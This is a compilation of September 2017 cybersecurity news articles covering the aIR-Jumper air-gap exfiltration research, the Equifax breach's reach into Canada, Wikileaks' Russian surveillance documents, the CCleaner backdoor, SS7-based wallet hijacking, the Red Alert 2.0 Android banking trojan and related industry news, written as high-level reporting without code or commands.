The same research team has devised numerous techniques to exfiltrate data from air-gapped networks across the years, including DiskFiltration, AirHopper, BitWhisper, LED-it-Go, SPEAKE(a)R, USBee, Fansmitter, xLED.

The current research project dubbed aIR-Jumper, leverage on a malicious code that must be installed on the target computers which enables the attackers to control it with security surveillance cameras/software, or on a computer in the same network with the camera.

“In this paper, we show how attackers can use surveillance cameras and infrared light to establish bi-directional covert communication between the internal networks of organizations and remote attackers. We present two scenarios: exfiltration (leaking data out of the network) and infiltration (sending data into the network). ” reads the paper published by the team and titled “aIR-Jumper: Covert Air-Gap Exfiltration/Infiltration via Security Cameras & Infrared (IR)“

The malicious code is able to steal data from an infected system and then convert it into a sequence of ones and zeros that is then transmitted by making the device’s infrared LEDs blinking.

“By blinking the IR LEDs an attacker can leak sensitive data stored on the device, such as credentials
and cryptographic keys, at a speed of 15 bit/sec. However, in their method the attacker must find a way to insert the compromised hardware into the organization. In contrast, our method uses the IR LEDs that already exist in surveillance and security cameras and doesn’t require special or malicious
hardware.” continues the paper.

On the other end, an attacker sitting in the range of the security camera’s infrared LED will be able to receive the blinking and use an application developed by the ream to reconstructs stream of data sent through the led blinking.

The researchers also demonstrated that an attacker can use an infrared LED to send new commands to a security camera inside an infected network. The malicious code developed by the experts analyzes the camera’s video feed, detect infrared LED transmissions and convert the incoming blinks into new commands.

The expert implemented a malware prototype and evaluated it with different models of cameras and discussed preventive and defensive countermeasures.

“Our evaluation shows that an attacker can use IR and surveillance cameras to communicate over the air-gap to a distance of tens to hundreds of meters away. We demonstrate how data can be leaked from the network at a bit rate of 20 bit/sec (per camera) and be delivered to the network at bit rate of more than 100 bit/sec (per camera).” states the paper.

The exfiltration speed obtained by the researchers is low compared to the one obtained with other techniques tested by the same group of researchers. In July, the team of experts led by the expert Mordechai Guri developed a specific firmware dubbed xLED that allowed them to control the LED while the router is working. The router LEDs were used to exfiltrate data from air-gapped networks with better performance compared with aIR-Jumper.

The researchers explained that infrared signals are better than router LEDs because infrared signals bounce of nearby surfaces with a higher reflection rate, this means that attackers don’t necessarily need a line of sight to the camera.

In the following table, the aIR-Jumper technique is compared with others devised by the research team

aIR-Jumper IR

In their research paper. the team proposes a series of software and hardware countermeasures, such as window shielding, IR LED activity monitoring, firmware controls for disabling IR support, irregular access to camera API functions, suspicious traffic detection (LED control), and also LEDs covering /disconnecting.

I reached Mordechai Guri for a comment:

“This air-gap covert-channel is unique since it allow attackers to establish a bi-directional communication with a remote attacker, like a TCP/IP connection with IR signals and security cameras: you can send a request and receive a response. Almost all existing air-gap covert-channels allows only one way communication”

The experts published two videos PoC that show how they send commands to the aIR-Jumper malware via the security camera, and how they exfiltrate data from the affected network.


Equifax Breach Affects 100,000 Canadians
20.9.2017 securityweek Cyber
Equifax revealed on Tuesday that the recent data breach affects roughly 100,000 Canadian consumers, but the company’s systems in Canada were not compromised.

Equifax Canada said the company’s investigation is still ongoing, but it believes the incident affects approximately 100,000 Canadians. Similar to the United States, the exposed information includes names, addresses, social insurance numbers, and, in some cases, credit card numbers.

“Equifax Canada can confirm that Canadian systems are not affected. We have found no evidence of unauthorized activity on Equifax's core consumer or commercial credit reporting databases. Equifax Canada systems and platforms are entirely separated from those impacted by the Equifax Inc. cybersecurity incident widely reported in the U.S.,” the company said.

Impacted individuals will be notified via mail and they will be offered credit monitoring and identity theft protection services for one year at no charge.

Equifax said it notified MasterCard and Visa about the payment cards compromised in the breach. The company has also informed the Privacy Commissioner of Canada (OPC), the Commissioners in Alberta, British Columbia, and Quebec, and consumer reporting registrars in Ontario, Alberta and Saskatchewan.

While the number of individuals affected by the breach in Canada has only now come to light, some Canadian consumers launched a class action lawsuit within a week of disclosure. The initiators of the suit are seeking damages of $550 billion CAD ($450 billion US).

Equifax said cybercriminals had access to its U.S. systems between mid-May and late July after leveraging an Apache Struts 2 vulnerability that had been exploited in the wild since March.

The company said the breach affects roughly 143 million U.S. consumers and 400,000 customers in the United Kingdom. In the case of the U.K., the credit reporting agency revealed that the data was stored on U.S. systems between 2011 and 2016 due to a “process failure.” No such explanation has been provided by Equifax Canada.

Equifax stock has dropped from roughly $140 to just over $90 following the breach and experts believe it could plunge as low as $50. The incident has already cost the company nearly $10 billion in market value.

The company’s Chief Security Officer and Chief Information Officer retired after the hack came to light.

In the United States, the Federal Trade Commission (FTC), congressional committees, and the Attorneys General in 40 states have announced the launch of investigations into the Equifax breach.


Wikileaks Spy File Russia – the surveillance apparatus implemented by firm Peter-Service
20.9.2017 securityaffairs BigBrothers

Wikileaks releases a new batch of documents that claim to detail the Russia mass surveillance apparatus implemented with the help of firm Peter-Service.
Wikileaks has released a batch of documents, dubbed Spy File Russia, that detail the surveillance infrastructure implemented by Russia. The Kremlin’s surveillance apparatus allows the Russian agencies to spy online activities and mobile devices.

According to the Italian Wikileaks media partners, the Italian newspaper La Repubblica, the documents cover “an extended timespan from 2007 to June 2015”.


WikiLeaks ✔@wikileaks
RELEASE: Spy Files #Russia https://wikileaks.org/spyfiles/russia/ … #SORM #FSB

11:25 AM - Sep 19, 2017
78 78 Replies 1,307 1,307 Retweets 1,307 1,307 likes
Twitter Ads info and privacy
This is the first time Wikileaks has leaked material related to the Russian state, documents report of a Russian company which supplies software to telecommunication companies that is also installing equipment used by Russian state agencies to tap into.

It is a surveillance apparatus that enable the Russian intelligence to search and spy on citizens’ digital activity,

Wikileaks released 34 “base documents” relate to the activity of a St. Petersburg-based company, called Peter-Service. The company is a contractor for Russian state surveillance, it was set up in 1992 to provide billing solutions, it is a major supplier of software to the mobile telecoms operators.

“The technologies developed and deployed by PETER-SERVICE today go far beyond the classical billing process and extend into the realms of surveillance and control. Although compliance to the strict surveillance laws is mandatory in Russia, rather than being forced to comply PETER-SERVICE appears to be quite actively pursuing partnership and commercial opportunities with the state intelligence apparatus.” reported Wikileaks

“As a matter of fact PETER-SERVICE is uniquely placed as a surveillance partner due to the remarkable visibility their products provide into the data of Russian subscribers of mobile operators, which expose to PETER-SERVICE valuable metadata, including phone and message records, device identifiers (IMEI, MAC addresses), network identifiers (IP addresses), cell tower information and much more. This enriched and aggregated metadata is of course of interest to Russian authorities, whose access became a core component of the system architecture.”

Wikileaks PETER-SERVICE software architecture

It is interesting to note that the leaked documents never reference the Russia intelligence agency, the FSB, but “speak only of state agencies.”

Under Russia law operators must maintain a Data Retention System (DRS) that allows them to store data for up to three years.

“The Peter-Service DRS system allows Russian state agencies to query the database of all stored data to search for information such as calls made by a certain telephone company customer, the payment systems used, the cell that served the specific mobile. The manuals published by WikiLeaks contain the images of the interfaces that allow agents to search within this huge trove of data, so access is simple and intuitive.” wrote Stefania Maurizi, on the Italian media outlet La Repubblica.

According to Wikileaks, Peter-Service’s DRS solution can handle 500,000,000 connections per day in just one cluster, the system has high performance, the claimed average search time for subscriber related-records from a single day is ten seconds.

“The data retention system is a mandatory component for operators by law; it stores all communication (meta-)data locally for three years. State intelligence authorities use the Protocol 538 adapter built into the DRS to access stored information.” continues Wikileaks.

The Peter-Service has also developed a system called TDM (Traffic Data Mart), that records and monitors IP traffic for all mobile devices registered with the operator.

The system enables Russian agencies to track online activity of the targets, including visited sites, forums, social media.

The TDM maintains a list of categorized domain names — “which cover all areas of interest for the state. These categories include blacklisted sites, criminal sites, blogs, webmail, weapons, botnet, narcotics, betting, aggression, racism, terrorism and many more”.

“Based on the collected information the system allows the creation of reports for subscriber devices (identified by IMEI/TAC, brand, model) for a specified time range: Top categories by volume, top sites by volume, top sites by time spent, protocol usage (browsing, mail, telephony, bittorrent) and traffic/time distribution,”.

Wikileaks points to a 2013 Peter-Service slideshow presentation that was published on the company website that focuses on a new product, called DPI*GRID; The product is a hardware equipment for Deep Packet Inspection that takes the form of “black boxes” apparently able to handle 10Gb/s traffic per unit.

“However, the core of the presentation is about a new product (2013) called DPI*GRID – a hardware solution for “Deep Packet Inspection” that comes literally as “black boxes” that are able to handle 10Gb/s traffic per unit.” continues Wikileaks.”The national providers are aggregating Internet traffic in their infrastructure and are redirecting/duplicating the full stream to DPI*GRID units. The units inspect and analyse traffic (the presentation does not describe that process in much detail); the resulting metadata and extracted information are collected in a database for further investigation. A similar, yet smaller solution called MDH/DRS is available for regional providers who send aggregated IP traffic via a 10Gb/s connection to MDH for processing.”

wikileaks Russian survellance 2

Peter-Service argues that Moscow must be able to make better use of the power of data and reliance on itself. “Who controls the information, controls the world,” concludes Peter-Service, pointing out how much President Obama’s power of America is based on NSA’s mass surveillance, as revealed by Snowden.

“Drawing specifically on the NSA Prism program, the presentation offers law enforcement, intelligence and other interested parties, to join an alliance in order to establish equivalent data-mining operations in Russia,” it adds — sticking its boot firmly back into U.S. government mass surveillance programs.


Populární nástroj CCleaner obsahuje malware, je potřeba rychlý update

20.9.2017 SecurityWorld Hacking
Aktualizace oblíbeného nástroje pro optimalizaci a čištění počítače CCleaner obsahovala nebezpečný malware. Pokud je tento malware v počítači uživatele nainstalovaný, mohou získat hackeři přístup do uživatelova počítače i do ostatních propojených systémů.

Následně pak mohou získat přístup k citlivým datům či přístupovým údajům k internetovému bankovnictví nebo jiným účtům. Na incident upozornil bezpečnostní tým Cisco Talos.

Windowsovská 32bitová verze 5.33.6162, která byla ke stažení mezi 15. srpnem a 12. zářím 2017, obsahovala nebezpečný malware, který v průběhu aktualizace infikoval uživatelská zařízení.

V tuto chvíli už byla infikovaná verze stažena a není dostupná. Nicméně mnoho uživatelů je stále vystaveno riziku i po updatu nástroje. Infikován byl také CCleaner Cloud, verze 1.07.3191.
Zdroj: Cisco

Zdroj: Cisco

Podle Avastu, pod který v současnosti CCleaner patří, ke kompromitaci došlo ještě před akvizicí firmy Piriform, což je původní tvůrce CCleaneru. K té došlo v polovině července 2017, ke kompromitaci programu zadními vrátky (backdoorem) ale už začátkem července.

Také počet zasažených uživatelů je prý relativně nízký – Avast hovoří o celkově 2,27 milionu a vzhledem k proaktivnímu přístupu k aktualizaci co největšího počtu uživatelů je to nyní pouze 730 000 uživatelů, kteří stále používají příslušnou verzi (5.33.6162).

Tito uživatelé by měli podle Avastu co nejdříve své programy upgradovat, i když prý nejsou ohroženi, protože malware byl na straně serveru CnC zakázán.

CCleaner je jeden z nejrozšířenějších nástrojů pro čistění a optimalizaci výpočetních zařízení. Jednoduše dokáže odstranit nepotřebné aplikace a tím zrychlit chod počítačů či chytrých telefonů. Na konci roku 2016 dosáhl program více než 2 miliard stažení a každý týden narůstal počet jeho uživatelů o 5 milionů.


Here’s How Hackers Can Hijack Your Online Bitcoin Wallets
19.9.2017 thehackernews Hacking
Researchers have been warning for years about critical issues with the Signaling System 7 (SS7) that could allow hackers to listen in private phone calls and read text messages on a potentially vast scale, despite the most advanced encryption used by cellular networks.
Despite fixes being available for years, the global cellular networks have consistently been ignoring this serious issue, saying that the exploitation of the SS7 weaknesses requires significant technical and financial investment, so is a very low risk for people.
However, earlier this year we saw a real-world attacks, hackers utilised this designing flaw in SS7 to drain victims' bank accounts by intercepting two-factor authentication code (one-time passcode, or OTP) sent by banks to their customers and redirecting it to themselves.
If that incident wasn't enough for the global telecoms networks to consider fixing the flaws, white hat hackers from Positive Technologies now demonstrated how cybercriminals could exploit the SS7 flaw to take control of the online bitcoin wallets to steal all your funds.
Created in the 1980s, SS7 is a telephony signalling protocol that powers over 800 telecom operators across the world, including AT&T and Verizon, to interconnect and exchange data, like routing calls and texts with one another, enabling roaming and other services.
Here's How Hackers Hacked into Bitcoin Wallet and Stole Fund

While demonstrating the attack, the Positive researchers first obtained Gmail address and phone number of the target, and then initiated a password reset request for the account, which involved sending a one-time authorization token to be sent to the target's phone number.
Just like in previous SS7 hacks, the Positive researchers were able to intercept the SMS messages containing the 2FA code by exploiting known designing flaws in SS7 and gain access to the Gmail inbox.
From there, the researchers went straight to the Coinbase account that was registered with the compromised Gmail account and initiated another password reset, this time, for the victim's Coinbase wallet. They then logged into the wallet and emptied it of crypto-cash.
Fortunately, this attack was carried out by security researchers rather than cybercriminals, so there wasn't any actual fraud of bitcoin cryptocurrencies.
This issue looks like a vulnerability in Coinbase, but it's not. The real weakness resides in the cellular system itself.
Positive Technologies has also posted a proof-of-concept video, demonstrating how easy it is to hack into a bitcoin wallet just by intercepting text messages in transit.
Different SS7 Attack Scenarios
This attack is not limited to only cryptocurrency wallets. Any service, be it Facebook or Gmail, that relies on two-step verification are vulnerable to the attacks.
The designing flaws in SS7 have been in circulation since 2014 when a team of researchers at German Security Research Labs alerted the world to it.
The flaws could allow hackers to listen to phone calls and intercept text messages on a potentially massive scale, despite the most advanced encryption used by cellular network operators.
Last year, the researchers from Positive Technologies also gave demonstrations on the WhatsApp, Telegram, and Facebook hacks using the same designing flaws in SS7 to bypass two-factor authentication used by those services.
At TV program 60 Minutes, Karsten Nohl of German Security Research Labs last year demonstrated the SS7 attack on US Congressman Ted Lieu's phone number (with his permission) and successfully intercepted his iPhone, recorded call, and tracked his precise location in real-time just by using his cell phone number and access to an SS7 network.
Although the network operators are unable to patch the issues anytime soon, there's little a smartphone user can do.
Avoid using two-factor authentication via SMS texts for receiving OTP codes. Instead, rely on cryptographically-based security keys as a second authentication factor.


Red Alert 2.0: New Android Banking Trojan for Sale on Hacking Forums
19.9.2017 thehackernews Android

The Recent discoveries of dangerous variants of the Android banking Trojan families, including Faketoken, Svpeng, and BankBot, present a significant threat to online users who may have their login credentials and valuable personal data stolen.
Security researchers from SfyLabs have now discovered a new Android banking Trojan that is being rented on many dark websites for $500 per month, SfyLabs' researcher Han Sahin told The Hacker News.
Dubbed Red Alert 2.0, the Android banking malware has been fully written from scratch, unlike other banking trojans, such as BankBot and ExoBot, which were evolved from the leaked source code of older trojans.
The Red Alert banking malware has been distributed via many online hacking forums since last few months, and its creators have continuously been updating the malware to add new functionalities in an effort to make it a dangerous threat to potential victims.
Malware Blocks Incoming Calls from Banks
Like most other Android banking trojans, Red Alert has a large number of capabilities such as stealing login credentials, hijacking SMS messages, displaying an overlay on the top of legitimate apps, contact list harvesting, among others.
Besides this, Red Alert actors have also added an interesting functionality to its malware, like blocking and logging all incoming calls associated with banks and financial associations.
This would potentially allow the Red Alert malware to prevent warnings of a compromised account to be received by the victims from their associated banks.
Malware Uses Twitter As Backup C&C Infrastructure

Another most interesting thing about Red Alert 2.0 is that it uses Twitter to prevent losing bots when its command and control server is knocked offline.
"When the bot fails to connect to the hardcoded C2 it will retrieve a new C2 from a Twitter account," SfyLabs researchers said in a blog post.
"This is something we have seen in the desktop banking malware world before, but the first time we see it happening in an Android banking trojan."
The Red Alert 2.0 is currently targeting victims from more than 60 banks and social media apps across the world and works on Android 6.0 (Marshmallow) and previous versions.
Here's How the Red Alert 2.0 Trojan Works:
Once installed on victim's phone via the third-party app store, the malware waits for the victim to open a banking or social media app, whose interface it can simulate, and once detected, the Trojan immediately overlays the original app with a fake user interface.
The fake interface then informs the victim that there is an error while logging the user in and requests the user to re-authenticate his/her account.
As soon as the user enters the credentials into the fake user interface, Red Alert records them and sends them to the attacker-controlled command and control (C&C) server to be used by the attackers to hijack the account.
In case of banking apps, the recorded information is being used by attackers to initiate fraudulent transactions and drain the victim's bank account.
Since Red Alert 2.0 can also intercept SMS text messages received by the infected smartphone, the trojan could work around two-factor authentication techniques that otherwise are designed to throttle such attacks.
Ways to Protect Yourself Against Such Android Banking Trojans
The easiest way to prevent yourself from being a victim of one such mobile banking Trojan is to avoid downloading apps via third-party app stores or links provided in SMS messages or emails.
Just to be on the safer side, go to Settings → Security and make sure "Unknown sources" option is turned off on your Android device that blocks installation of apps from unknown sources.
Most importantly, verify app permissions before installing any app, even from official Google Play Store, and if you find any application asking more than what it is meant for, just do not install it.
It is always a good idea to install an anti-virus app from a reputed vendor that can detect and block such Trojan before it can infect your device.
Also, always keep your system and apps up-to-date.


Android AV App Collected Data on Tens of Millions Users
19.9.2017 securityweek Android
Tens of millions of Android users potentially had their information collected by a security application distributed through Google Play, Check Point security researchers warn.

Called DU Antivirus Security, the software had between 10 and 50 million downloads when the security researchers alerted Google on its data collection practices on August 21. The application was removed from the store on August 24, but was reinstated on August 28, after its developers removed the information-collecting code.

Offered for free, the security software is developed by the DU group, and was discovered to collect a variety of user data without requesting consent from the device owner. The data collection activities, the security researchers discovered, were performed only at the application’s first run.

According to Check Point, the information collected by the application from Android devices included unique identifiers, contact list, call logs, and potentially the location of the device. After gathering the information, the app was encrypting it and sending it to a remote server.

The security researchers also discovered that the collected information was then used by another app offered by the DU group, namely Caller ID & Call Block – DU Caller. The software is designed to provide users with information about incoming phone calls.

“While users trusted DU Antivirus Security to protect private information, it did the exact opposite. It collected the personal information of its users without permission and used that private information for commercial purposes,” Check Point notes.

The software would log information on personal calls, as well as details on who and for how long the user talked to. DU Antivirus Security 3.1.5 includes the malicious code, and potentially so do previous application releases.

The same data-collecting code was found in 30 other applications, including 12 programs distributed through Google Play, Check Point reveals in a report. The apps, which have been removed, had between 24 and 89 million downloads in total. Affected users are advised to upgrade to newer versions of DU Antivirus Security and any other impacted app.

The malicious code was supposedly implemented in these applications through an external library, but they transmitted the collected data to the same server used by DU Caller, the security researchers say.

“Since anti-virus apps have a legitimate reason to request unusually extensive permissions, they are the perfect cover for fraudsters looking to abuse these permissions. In some cases, mobile anti-virus apps are even used as a decoy for delivering malware. Users should be aware of these suspicious anti-virus solutions, and use only mobile threat protection from reputable vendors that are proven to be capable of safeguarding mobile devices and the data stored in them,” Check Point notes.

The security researchers discovered that the malicious code would send the gathered data to the server caller.work. While the domain isn’t registered to DU apps, it has two subdomains that reveal a connection to the developer.

One is reg.caller.work, a PHP webpage that specifies hostname us02-Du_caller02.usaws02 (which contains the name of the DU Caller app). The other is vfun.caller.work, hosted on a private server that also hosts the domain dailypush.news, which is registered to a Baidu employee. DU apps are part of the Baidu group and the employee posted about functionality related to the caller app, which indicates a connection with the data collected by the malicious code.

The DU Caller app has been already criticized for its ambiguous privacy policy, which displays different terms on separate pages, as well as for executing activity regardless of whether it has the user consent or not. DU Caller was also affected by one of the largest data breaches, exposing over 2 billion user phone numbers earlier this year, a Risk Based Security report revealed in July.


EU to Launch Cybersecurity 'Safety Labels'
19.9.2017 securityweek Cyber
The European Union unveiled plans Tuesday to step up its response to cyber attacks, including a new intelligence-sharing agency, cyber war games and product safety labels.

The proposals by the European Commission, the executive arm of the 28-nation bloc, come amid growing concerns over election hacking by foreign states, ransomware attacks and other cybercrime like identity theft and bank fraud.

"Cyberattacks are becoming more frequent, imaginative and global," Andrus Ansip, the European Commission Vice President for the Digital Single Market, told a press conference. "The EU needs to respond to them 24/7."

Building on an existing agency based in Greece, the new EU Cybersecurity Agency would help countries deal with cyber threats. It would also organise yearly pan-European cybersecurity exercises and ensure better sharing of intelligence.

The agency would also help create EU-wide certificates -- much like labels that are currently used for food safey -- for trusted energy, transport and other networks, as well as new consumer devices, like connected cars.

"I want high cybersecurity standards to become the new competitive advantage of our companies," said Mariya Gabriel, commissioner for the digital economy and society.

The EU will also launch cyber defence training next year and work with Brussels-based NATO on the issue.

Meanwhile the commission also unveiled fresh steps towards creating what it calls a digital single market for data for the world's biggest free-trade bloc of around 500 million people and worth tens of billions of euros.

It proposed the free flow of non-personal data across the bloc, rather than have member states require firms to store and process data within their borders, unless there are public security reasons.

The new rules still have to be approved by EU states and the European Parliament.


New Android Banking Trojan Red Alert 2.0 available for sale on crime forums
19.9.2017 securityaffairs Android

Researchers discovered a new Android banking Trojan, dubbed Red Alert 2.0, that is being offered for rent on many dark websites for $500 per month.
Researchers with security firm SfyLabs have discovered a new Android banking Trojan, dubbed Red Alert 2.0, that is being offered for rent on many dark websites for $500 per month.

“The last several months a new actor has been very busy developing and distributing a new Android trojan dubbed ‘Red Alert 2.0’ by the actor. The bot and panel (C&C) are fully written from scratch, while many other trojans are evolutions of leaked sources of older trojans.” reads a blog post published by SfyLabs.

The Red Alert 2.0 Android banking malware has been developed from scratch and has been offered for rent via many online hacking forums since last few months. The authors of the malware are continuously updating it, adding new features.

The Red Alert 2.0 is currently targeting over 60 banks and social media apps across the world, it works on Android 6.0 Marshmallow and previous versions.
The malware implements features that are common to many other similar threats, it is able to steal login credentials, hijack SMS messages, display an overlay on the top of legitimate apps, steal the contact.

Researchers noticed the authors also added interesting features to Red Alert 2.0, including blocking and logging all incoming calls associated with banks and financial associations.

“Red Alert actors are regularly adding new functionality, such as blocking and logging incoming calls of banks (see image below), which could affect the process of fraud operation departments at financials that are calling users on their infected Android phone regarding potential malicious activity.” continues the post.

This would potentially allow the Red Alert malware to intercept warnings of a compromised account to be received by the victims.

Red Alert banking trojan also leverages Twitter as backup C&C Infrastructure when the C2 server is taken offline,

Red Alert 2.0 banking Trojan
“Another interesting vector is the use of Twitter to avoid losing bots when the C2 server is taken offline (NTD). When the bot fails to connect to the hardcoded C2 it will retrieve a new C2 from a Twitter account. ” continues SfyLabs researchers.

“This is something we have seen in the desktop banking malware world before, but the first time we see it happening in an Android banking trojan.”

Once installed on victim’s device, the malware remains silent waiting for the victim to open a banking or social media app, then it overlays the original app with a fake user interface.

The Red Alert 2.0 malware attempts to trick victims into providing login credentials by displaying a fake interface then informs him that the authentication failed.

“Upon opening an application that is targeted by Red Alert an overlay is shown to the user. When the user tries to log in he is greeted with an error page. The credentials themselves are then sent to the C2 server. To determine when to show the overlay and which overlay to show, the topmost application is requested periodically.” continues the post.

The stolen credentials are used by the attackers to operate on behalf of the victims and initiate fraudulent transactions.

Red Alert 2.0 can also intercept SMS text messages an ability that would allow it to bypass two-factor authentication mechanisms implemented by the banks.

To Protect yourself against this threat don’t download apps via third-party app stores, never click on suspicious links provided in SMS messages or emails, and keep your system and apps up-to-date.


Siemens, PAS Partner on Industrial Cybersecurity
19.9.2017 securityweek Cyber
Engineering giant Siemens and PAS, a company that specializes in cyber security solutions for industrial control systems (ICS), announced on Tuesday a new strategic partnership.

The goal of the partnership is to provide organizations the capabilities needed to identify and inventory assets, including distributed and legacy control systems, and provide visibility for detecting cyber threats and unauthorized engineering changes in multi-vendor environments.Siemens and PAS partnership

The solutions offered as a result of the partnership can be ideal for fleet-wide monitoring in the oil and gas sector, which is largely unprepared to address cybersecurity risks in operational technology (OT) environments.

Eddie Habibi, founder and CEO of PAS, pointed out that security personnel in energy and oil & gas facilities is in many cases “blind” to the configuration state of most of their cyber assets.

“Siemens chose to help address this gap with our Cyber Integrity software, which provides customers with the context they need to drive targeted security responses to incidents and ultimately to harden systems that were designed, built, and deployed before cybersecurity was a design consideration,” Habibi told SecurityWeek. “Siemens understands that any managed security service that is going to reduce risk in any meaningful way must include all critical vendor assets.”

Leo Simonovich, Vice President of Global Cyber Security at Siemens, noted that the company had previously partnered with Darktrace for network intrusion detection and it has now selected PAS for its ability to provide configuration visibility into proprietary industrial control systems.

“These are the systems that have direct responsibility for controlling volatile processes and ensuring safety in an industrial facility. Most companies lack sufficient visibility into these critical endpoints,” Simonovich said. “With PAS, we aim to lift that veil and raise the security posture of our customers through visibility into proprietary assets and deep analytics for indicators of compromise.”

Siemens’ products are available as standalone services or part of the company’s comprehensive managed security offering, depending on the customer’s needs and maturity. PAS also provides comprehensive security services, but the company’s integrity, inventory and configuration management solutions can be acquired separately by organizations that have their own security operations centers (SOCs).

“Chief Information Security Officers with whom we speak want to leverage existing investments to reduce security risk,” explained Habibi. “Where PAS has an install base, Siemens is a natural add-on service that helps CISO’s gain actionable intelligence on systems that frankly are the lifeblood of critical infrastructure industries. Likewise, existing Siemens customers who will have other vendor systems in place, will have the ability to bring these systems under one security monitoring umbrella. This is unprecedented.”


Container Security Firm Aqua Raises $25 Million
19.9.2017 securityweek IT
Aqua Security, a Tel Aviv, Israel-based container security startup, today announced that it has raised $25 million in Series B funding, bringing the total amount raised by the company to $38.5 million.

Container technologies are becoming increasingly popular among IT decision makers, as they offer a means to deploy applications faster when compared to traditional methods.

Aqua’s Container Security Platform delivers a security solution for containerized environments, and supports both Linux and Windows containers, multiple orchestration environments, both on-premises deployments as well as on AWS, Azure, GCP, and other public clouds.

“On a fundamental level, container security is equivalent to hypervisor security,” F5’s David Holmes explained in a 2015 SecurityWeek column.

Aqua says that it uses a combination of intelligent defaults, machine learning, and threat research to protect container-based applications.

The Series B round was led by Lightspeed Venture Partners, while existing investors Microsoft Ventures, TLV Ventures and Shlomo Kramer also participated in the round.

“The rapid rise and convergence of DevOps, containers, and microservices-based applications is an opportunity to rethink application security.” said Chris Schaepe, Partner, Lightspeed Venture Partners. “Aqua’s success in leveraging containers to improve security provides visible customer value, as evident from the impressive customer adoption that the team at Aqua achieved in a very short time.”

According to a 2015 survey of 272 IT decision makers in North America conducted by container security specialist Twistlock, 91 percent of the respondents said they were concerned about the security of containers.

Founded in 2015, Aqua says two of the 10 largest financial services companies and three of the world’s top 10 software companies are customers. The company has office locations in San Francisco, CA, Burlington, MA, and London, UK.


U.S., Moscow Seek Russian Held in Greece over Bitcoin Laundering
19.9.2017 securityweek IT
Moscow has requested the extradition of a Russian national also wanted in the United States for laundering billions of dollars through a Bitcoin exchange he operated, a judicial source said Tuesday.

Alexander Vinnik, who headed BTC-e, an exchange he operated for the Bitcoin crypto-currency, was indicted by a US court in late July on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

He has been languishing in a Greek jail since his arrest on July 25 in the tourist resort of Halkidiki, near the northern city of Thessaloniki.

According to the judicial source, Vinnik said he would not contest Moscow's request, dated August 10. He is wanted there on separate fraud charges totalling 9,500 euros ($11,000).

According to US authorities, Vinnik, 37, "stole identities, facilitated drug trafficking, and helped to launder criminal proceeds from syndicates around the world."

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity," receiving more than $4 billion worth of bitcoin over the course of its operation.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges, but according to the indictment, it was "heavily reliant on criminals" engaged in identity theft and drugs, as well as corrupt public officials.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The Treasury Department has fined BTC-e $110 million for "wilfully violating" US anti-money laundering laws, and Vinnik $12 million.

In July, Treasury Secretary Steven Mnuchin hailed Vinnik's arrest and indictment, saying that cracking down on illegal uses of the cyber currency is a key goal of US regulators.

The Greek justice system will now have to decide whether Vinnik heads to Moscow or Washington.


Google, Spotify Release Open Source Cloud Security Tools
19.9.2017 securityweek Security
Google and music service Spotify announced last week the launch of Forseti Security, a community-driven collection of open source tools designed to improve security in Google Cloud Platform (GCP) environments.

The Forseti toolkit currently includes an inventor tool that provides visibility into GCP resources, a scanner that validates access control policies, an enforcement tool that removes unwanted access to resources, and an add-on that helps users understand, test and develop Identity and Access Management (IAM) policies.Forseti Security

“Forseti gives us visibility into the GCP infrastructure that we didn’t have before, and we use it to help make sure we have the right controls in place and stay ahead of the game,” Spotify said.

“It helps keep us informed about what’s going on in our environment so that we can quickly find out about any risky misconfigurations so they can be fixed right away. These tools allow us to create a workflow that puts the security team in a proactive stance rather than a reactive one. We can inform everyone involved on time rather than waiting for an incident to happen,” the company added.

The Inventory tool continually generates snapshots of GCP resources and provides an audit trail. The Scanner helps detect misconfigurations and security bugs, and informs the team in charge when an issue has been discovered.

Spotify started developing security tools for GCP after moving its operations from in-house data centers to the cloud. The tools are designed to help the company automate its security processes in order to enable its engineering team to develop freely and securely.

Google had been developing its own security tools and since both companies wanted to release them as open source, they decided to collaborate, which led to the creation of the Forseti Security project.

Security experts can submit feature requests and bug reports, or they can contribute to Forseti development efforts.


POS Malware Abuses Exposed ElasticSearch Nodes for C&C
19.9.2017 securityweek  Virus
Two point of sale (POS) malware families have been abusing thousands of publicly accessible ElasticSearch nodes for command and control (C&C) purposes, Kromtech security researchers warn.

Malicious files discovered on the ElasticSearch deployments referenced to the AlinaPOS and JackPOS malware families, which are well known for their wide use in credit card data theft campaigns. Both threats have been designed to scrape credit card data from computer memory.

Both JackPOS and AlinaPOS have been around for several years and have seen numerous variants to date, each employing different techniques to steal credit card data. Already widespread, POS malware is active year-round, but usually shows spikes in activity during the holiday shopping season.

According to Kromtech, Alina is now available for sale online and some of its variants are enjoying low detection rates by popular anti-virus engines (tested with VirusTotal). Even relatively old C&C servers hosting sites can’t be used reliably for detection, they say.

Contributing to this situation was the fact that many ElasticSearch servers aren’t properly configured, thus allowing attackers to abuse them for their nefarious purposes. In this instance, infected servers were used as part of a larger POS botnet purposed for C&C functionality, controlling POS malware clients.

This isn’t the first time ElasticSearch nodes made the news after falling to miscreants. In January this year, after tens of thousands of MongoDB databases were ransacked, hackers turned to ElasticSearch servers, deleted data on them, and demanded various ransom amounts, claiming they can restore the wiped information.

A new wave of ransomware attacks on improperly secured MongoDB deployments was observed a couple of weeks back, prompting the company to implement new security measures. Cybercriminals targeting insecure ElasticSearch servers, however, appear to have had other plans for them.

After performing a Shodan search, Kromtech discovered nearly 4000 infected ElasticSearch servers, most of which (about 99%) are hosted on Amazon.

“Why Amazon? Because on Amazon Web Services you can get a free t2 micro (EC2) instance with up to 10 Gb of disk space. At the same time t2 micro allows to set up only versions ES 1.5.2 and 2.3.2. AWS-hosted ES service gives you a possibility to configure your ES cluster just in few clicks,” the researchers note.

This also means that many of those who configured the servers didn’t pay much attention to the security configuration steps during the quick installation process. Because of that, the servers remained exposed to attackers, and Kromtech discovered that multiple actors hit them, the same as it happened during the ransomware campaign in the beginning of the year.

Because the insecure ElasticSearch servers were infected multiple times, the discovered packages could be traced to different POS botnets. Due to periodic scans, time of infection could differ between servers, even if the same package is involved. The most recent infections occurred at the end of August 2017.

The security researchers also discovered that 52% of infected servers run ElasticSearch version 1.5.2, while 47% run version 2.3.2. The remaining 1% run other software versions.


New "Red Alert" Android Banking Trojan Emerges
19.9.2017 securityweek Android
A recently discovered Android banking Trojan features a bot and command and control panel fully written from scratch, SfyLabs has discovered.

